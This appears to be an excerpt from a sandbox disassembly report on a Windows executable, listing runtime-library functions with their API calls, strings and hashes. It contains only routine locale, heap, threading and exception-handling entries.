Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction ID: cb585fdb2482b244a4d3bef91fab55670e651a1c55327e645a67e42ff2a15e13
Opcode Fuzzy Hash: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction Fuzzy Hash: 4461D775D04249AFDF10CFA8C844AEF7FB9AF09308F16415AF804A7252D379D986CB69

Function 0041C196 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041BCC6: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 0041BCF1

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,0041BFDD,?,00000000,?,00000000,?), ref: 0041C1F7
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041BFDD,?,00000000,?,00000000,?), ref: 0041C239

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 828569ccb8714ae48c68675b61d17cc33801355f1d7dcceba0b097672ed0b71e
Instruction ID: 9d2c2a29c4c478eab1b1f1167368467c00d7c014d6dc0482c332f282e065d277
Opcode Fuzzy Hash: 828569ccb8714ae48c68675b61d17cc33801355f1d7dcceba0b097672ed0b71e
Instruction Fuzzy Hash: 4F512570E802448FDB24DFB6CC806EBBBE4EF91304F1485AFD09687251D7789982CB99

Function 0041479B Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00418F9F,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 004147CF
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00418F9F,?,?,00000000,?,00000000), ref: 004147ED

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: f1a5938a5601bf9906601374711c41b1ceba9ab1f18a1f51be4aa21c000efe52
Instruction ID: 3e5a2d8e864b1ea57e26fed8c24e94031886aaccac2bb831807e976e79a71a16
Opcode Fuzzy Hash: f1a5938a5601bf9906601374711c41b1ceba9ab1f18a1f51be4aa21c000efe52
Instruction Fuzzy Hash: D7F07A3250011ABBCF125F91DC05DDE3F66FF883A4F068115FA2826160CB36C9B2AB95

Function 00403EE0 Relevance: 3.0, APIs: 2, Instructions: 22
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,004038C0,00000000,00000000,A1DECC5C), ref: 00403F06
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403F0F

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
Instruction ID: 9ada69c4f7ca39928594594d106047c4e65b58e1a3541a0c5f1fc3d2bb6a9bfa
Opcode Fuzzy Hash: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
Instruction Fuzzy Hash: 10E08675758300BBD710EF24EC07F1A3BE4BB48B05F914A39F295A62D0D674B404965E

Function 0040A6F3 Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040A711
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0040A71C

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 9c410d7e829c24cb87da5089d7beec3d2e4487e642ba41feede22353f6cfb244
Instruction ID: 99a601bf2f1cfd01eef7b7606b89b927af1aeb670bfb824998f4adb5de5e3745
Opcode Fuzzy Hash: 9c410d7e829c24cb87da5089d7beec3d2e4487e642ba41feede22353f6cfb244
Instruction Fuzzy Hash: 07D0A73950430144D81426B12803E4A12A884527BD3B0967BE020BB2D1DB3CC0511A1F

Function 00414D5D Relevance: 2.6, APIs: 2, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DB3
GetLastError.KERNEL32(?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DBD

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction ID: ceb111eb948f9657ebdeceefd9bfba8073a9b29251fc9eed98a790ab6a2c0bec
Opcode Fuzzy Hash: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction Fuzzy Hash: 06114C336041241ADB246635BC867FE6749CBC1738F290A5FF808C72C1DE388CC2929C

Function 0041BD9A Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,0041BFE9,0041BFDD,00000000), ref: 0041BDCC

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 12fd2c2f15e29548472ec9e3af7dcab5f7542e97739875518ffedda74a0b877f
Instruction ID: f4a0d71df1ffb53e0e19ffd43ad9d64dc8bb1157ec8b6952aaf00382241378c0
Opcode Fuzzy Hash: 12fd2c2f15e29548472ec9e3af7dcab5f7542e97739875518ffedda74a0b877f
Instruction Fuzzy Hash: 4E516D715042589EDB218F28CD80BF67BBCEB55304F2405EEE699C7182C3789D86DFA4

Function 004143CC Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction ID: d7b25293e7db54f96000769fea1aeb7630fb582f3d7d0c2fc2c622193e8995c8
Opcode Fuzzy Hash: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction Fuzzy Hash: 620128373002255F9F25CF6EEC40ADB33A6FBC07243148136FA20CB684DA34D8829799

Function 00413EF2 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 00413F2C

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 86b5a37895ede01666616fd7f26fe40e68c10059cd8d9e9be6e6956d389c093e
Instruction ID: be02312cd07e58b193bdeee16c95f5fde802225de20a5ed1c7ae4422ede983e8
Opcode Fuzzy Hash: 86b5a37895ede01666616fd7f26fe40e68c10059cd8d9e9be6e6956d389c093e
Instruction Fuzzy Hash: 46110375A0420AAFCB05DF58E9419DB7BF9EF48304F04406AF809AB351D630EA15CBA8

Function 00414094 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,0000000C,?,?,004152D9,00000001,00000364,?,00000002,000000FF,?,?,0040E077,00415469), ref: 004140D5

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 14b8f9ac75b8980b6812ff089cde42dce8ba1f12a125e940596199f5ca44a4d3
Instruction ID: 7a371578952800d697783e4f14dfa84f7cfeb60b6085e341501622e7ba028638
Opcode Fuzzy Hash: 14b8f9ac75b8980b6812ff089cde42dce8ba1f12a125e940596199f5ca44a4d3
Instruction Fuzzy Hash: E9F0BB35605625ABDB215A63DC05BDB3F489FC5760B158123B904EB1A0CA68D9D1819D

Function 0041FB65 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction ID: 28cfbda6749b70c9de2fbd9d245fef773b8951bf2dd70127050a9a6bf190398c
Opcode Fuzzy Hash: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction Fuzzy Hash: 05D06C3210010DFBDF128F84DC06EDA3FAAFB4C714F018010FA5856021C732E832AB94

Non-executed Functions

Function 0041EBA1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(3FC00000,2000000B,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC3A
GetLocaleInfoW.KERNEL32(3FC00000,20001004,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC63
GetACP.KERNEL32(?,?,0041EEBF,?,00000000), ref: 0041EC78

Strings

OCP, xrefs: 0041EBF5
ACP, xrefs: 0041EBBF

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction ID: 81a9d30784dd22d719d41cfb92251f6e816e7a4bc62bdb22216d11a6fc444572
Opcode Fuzzy Hash: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction Fuzzy Hash: 92218E3AB04101AADB34CF56CD05AD773A7AF50B50B568826FD0AD7211F736EE81C798

Function 0041ED76 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000002,000000FF), ref: 004151E1

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0041EE82
IsValidCodePage.KERNEL32(00000000), ref: 0041EECB
IsValidLocale.KERNEL32(?,00000001), ref: 0041EEDA
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0041EF22
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0041EF41

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
Instruction ID: eeabbf5cfaddba79e94d22b4dd48aaeada7d5b667952b3c456454f902e5df75d
Opcode Fuzzy Hash: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
Instruction Fuzzy Hash: B4519075A00315ABDF20DFA6DC41BEB77B8FF48700F54442AAD14E7290E7789980CB69

Function 0041E412 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000002,000000FF), ref: 004151E1

GetACP.KERNEL32(?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E4D3
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?), ref: 0041E4FE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E661

Strings

utf8, xrefs: 0041E5D0

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
Instruction ID: 5e8f11e88951c7c1c9557d61489bca48d24d80555c5ca4e9e4b82e7d51b65768
Opcode Fuzzy Hash: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
Instruction Fuzzy Hash: 8F711775A00611AADB24AB77CC42BE773A8EF54708F14442BFD05D7281FB7CE9818799

Function 00415635 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004156C2

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction ID: 91afe31f9ab3d507f6121463a8ee3d13cfef47ac4a512e863f990cc27fdcea00
Opcode Fuzzy Hash: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction Fuzzy Hash: 92B15872E00645DFDB119F68C891BEEBBE5EF85310F14816BE815AB341D2389D81CBA9

Function 00407B01 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407B0D
IsDebuggerPresent.KERNEL32 ref: 00407BD9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407BF9
UnhandledExceptionFilter.KERNEL32(?), ref: 00407C03

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction ID: ca20a48664bdef0e78e9b146848890f6e34f40b99dedcfcf476291c653997e40
Opcode Fuzzy Hash: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction Fuzzy Hash: 1B314B75D0521CDBDF20DFA0D9497CDBBB8BF04304F1040AAE50DA7290EB756A859F09

Function 00404B20 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 191COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404B4C
std::_Lockit::_Lockit.LIBCPMT ref: 00404B69
std::_Lockit::~_Lockit.LIBCPMT ref: 00404B8D
std::_Lockit::~_Lockit.LIBCPMT ref: 00404BB8
std::_Lockit::_Lockit.LIBCPMT ref: 00404C2A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00404C7F
__Getctype.LIBCPMT ref: 00404C96
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00404CD6
std::_Lockit::~_Lockit.LIBCPMT ref: 00404D78
std::_Facet_Register.LIBCPMT ref: 00404D7E

Strings

bad locale name, xrefs: 00404D98
Ha, xrefs: 00404B57, 00404D8D

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
String ID: Ha$bad locale name
API String ID: 103145292-2505854350
Opcode ID: c0c875cd123add666a1ba57ec1f0c94ac2efaa9798bd961d6f12d2679ec0601c
Instruction ID: c45789c66640c356b2bc41b45c406846e681c44b1f4b151baf81fb86c109fe15
Opcode Fuzzy Hash: c0c875cd123add666a1ba57ec1f0c94ac2efaa9798bd961d6f12d2679ec0601c
Instruction Fuzzy Hash: 7B619FB19043408BD720DF65D941B5BB7F4AFD4304F05493EE989A7392E738E948CB5A

Function 0040A998 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0040AAB7
___TypeMatch.LIBVCRUNTIME ref: 0040ABC5
_UnwindNestedFrames.LIBCMT ref: 0040AD17
CallUnexpected.LIBVCRUNTIME ref: 0040AD32

Strings

csm, xrefs: 0040AAEE
csm, xrefs: 0040A9D5
hqB, xrefs: 0040AAAE
csm, xrefs: 0040AA42

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$hqB
API String ID: 2751267872-961717235
Opcode ID: e36ee884f164e9add2727880ca9071425b34f9d54382f0fd290b92e68b7c122e
Instruction ID: 1a84720c735a061b690d6f447b3278b908e1dcb1436106e9bb87ee9a1a6810cd
Opcode Fuzzy Hash: e36ee884f164e9add2727880ca9071425b34f9d54382f0fd290b92e68b7c122e
Instruction Fuzzy Hash: 2DB18A718003099FDF14DFA5C9809AEBBB5FF14304B19456BE8017B282C739DA61CF9A

Function 00422D42 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042485F), ref: 00422D5B

Strings

log, xrefs: 00422DB8, 00422DC7
asin, xrefs: 00422E88
acos, xrefs: 00422E91
log10, xrefs: 00422D9D, 00422DAC
pow, xrefs: 00422DF9, 00422EA3, 00422EF0
exp, xrefs: 00422DDA, 00422E3F
sqrt, xrefs: 00422E9A

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
Instruction ID: 541d14d2076966b173cd57405107be29c5c83d47e8039af315078564b0fddfcc
Opcode Fuzzy Hash: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
Instruction Fuzzy Hash: 76514371B0062AEBCB108F59FA4C1AEBBB0FB45304F924057D480A6354CBBD8925EB5E

Function 00405A29 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405A30
std::_Lockit::_Lockit.LIBCPMT ref: 00405A3A

Part of subcall function 00401980: std::_Lockit::_Lockit.LIBCPMT ref: 0040199C
Part of subcall function 00401980: std::_Lockit::~_Lockit.LIBCPMT ref: 004019B9

codecvt.LIBCPMT ref: 00405A74
std::_Facet_Register.LIBCPMT ref: 00405A8B
std::_Lockit::~_Lockit.LIBCPMT ref: 00405AAB
__EH_prolog3.LIBCMT ref: 00405AC5

Strings

pdB, xrefs: 00405B01
A]@, xrefs: 00405AEB

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Facet_Registercodecvt
String ID: A]@$pdB
API String ID: 2149013928-1964063989
Opcode ID: 48a836b95ea0a2a7942309d70e795f41733f6e8201952988750b77b38025a74f
Instruction ID: 869559141b16ddd60639a7327273d1e33329aff20660fcaf6a9c65af963ad09c
Opcode Fuzzy Hash: 48a836b95ea0a2a7942309d70e795f41733f6e8201952988750b77b38025a74f
Instruction Fuzzy Hash: E5318174A00615CFCB11EF68C480AAEBBF0FF48354F54452EE445AB392DB79AA00CF99

Function 0040718A Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407190
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0040719E
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004071AF
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004071C0

Strings

GetCurrentPackageId, xrefs: 00407198
GetTempPath2W, xrefs: 004071B5
GetSystemTimePreciseAsFileTime, xrefs: 004071A4
kernel32.dll, xrefs: 0040718B

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction ID: 3afd18a413fbafaec0d1884410ec314f69904bb85606d66d63126fe90f125993
Opcode Fuzzy Hash: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction Fuzzy Hash: 3CE0EC71749671AB83209F70BC0EDAA3AA4EE0971139205B2BD15D2361D6BC44559B9C

Function 00424323 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00EB6788,00EB6788,?,7FFFFFFF,?,004245F3,00EB6788,00EB6788,?,00EB6788,?,?,?,?,00EB6788,?), ref: 004243C9
__alloca_probe_16.LIBCMT ref: 00424484
__alloca_probe_16.LIBCMT ref: 00424513
__freea.LIBCMT ref: 0042455E
__freea.LIBCMT ref: 00424564
__freea.LIBCMT ref: 0042459A
__freea.LIBCMT ref: 004245A0
__freea.LIBCMT ref: 004245B0

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 8a56644c9f658ced4a7fecf9f58cf2b799a0c4498a4b3962048a55bd8390d3ba
Instruction ID: b3b1fd3be87dc675253da9249cad55eb0a70a834b65d1a532299ad71412a1fff
Opcode Fuzzy Hash: 8a56644c9f658ced4a7fecf9f58cf2b799a0c4498a4b3962048a55bd8390d3ba
Instruction Fuzzy Hash: 24711872B00625ABDF20AE64AC41BAF77B5DFC5314F94005BEA44A7381D73CDC8187A9

Function 00414301 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,A1DECC5C,?,0041440E,004038E3,?,?,00000000), ref: 004143C2

Strings

ext-ms-, xrefs: 0041436C
api-ms-, xrefs: 00414358

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction ID: 9d281342414512710d521e2bc5e8bd8d189b06f0c9bb1d1e4d3acc3ca9f27be4
Opcode Fuzzy Hash: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction Fuzzy Hash: 9E21F371B41219ABCB219B61AC41F9B77589F817B4F250222ED26A73C0D738ED42C6D8

Function 00422232 Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
Instruction ID: 9d2747a7e5b70225cc448f1b3832819408a251e63c6cb1e4317f51345b07cf5e
Opcode Fuzzy Hash: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
Instruction Fuzzy Hash: B9B1E870B00215BFDB11DF59D980BAE7BB1BF45304F94816AE401AB392C7B99D42CB69

Function 0040A62A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040A621,00408D5A,00407CB3), ref: 0040A638
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040A646
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040A65F
SetLastError.KERNEL32(00000000,0040A621,00408D5A,00407CB3), ref: 0040A6B1

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: f63bbb8cb7aec36dee6161e5b527cb909134a011cd361eeab7ab36a7405b742e
Instruction ID: 78011c5e5d228000ed262031febe4d72c2c7c60d5ad4d387ad9a5ce747099190
Opcode Fuzzy Hash: f63bbb8cb7aec36dee6161e5b527cb909134a011cd361eeab7ab36a7405b742e
Instruction Fuzzy Hash: 530128332093112ED62427B6BD45A5B2678DB51774738063FF510722F1EF7E5C11554D

Function 004114C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A1DECC5C,?,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 004114FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041150F
FreeLibrary.KERNEL32(00000000,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 00411531

Strings

CorExitProcess, xrefs: 00411507
mscoree.dll, xrefs: 004114F6

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

